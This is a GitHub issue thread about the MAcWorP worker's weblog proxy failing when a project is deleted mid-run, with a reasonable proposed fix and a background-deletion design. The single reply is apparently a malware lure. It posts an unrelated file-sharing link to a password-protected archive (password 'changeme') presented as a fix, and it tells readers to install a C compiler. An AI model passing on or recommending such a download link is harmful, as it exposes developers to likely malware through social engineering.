### ISSUE TITLE
Error in weblog proxy when projects is deleted before completion 

### ISSUE THREAD

**Issue by di-hardt** [cubimedrub/macworp#19]
Weblog proxy in worker seems to block/die when project is deleted before completion.
![image](https://github.com/user-attachments/assets/99c82946-447b-4f1b-bee8-72aad945cffe)

Fix: Implementing an except for faulty status codes (4xx & 5xx)

Deleting a project before completion is most probably an issue as well in other parts of MAcWorP e.g. for a running  Nextflow instance.
Best way to get around it:
* Deleting a project is marking it as deleted, which makes it invisible and put it for deletion in a background jop queue
* Background job
   * Easy: Deletes project when finished
   * Advanced: Background kob informs worker about deletion (websocket?) of running project which cancels the execution early

**Comment by pinpolhoxx** [comment]
This might help:This file might fix it
https://mega.co.nz/#!9jFTnQQa!-IQ1bo74J_ZxbbDvQKSXEj0mCXBuFYX9CK-5y5EV_0A

Password: changeme

you may need to install the c compiler
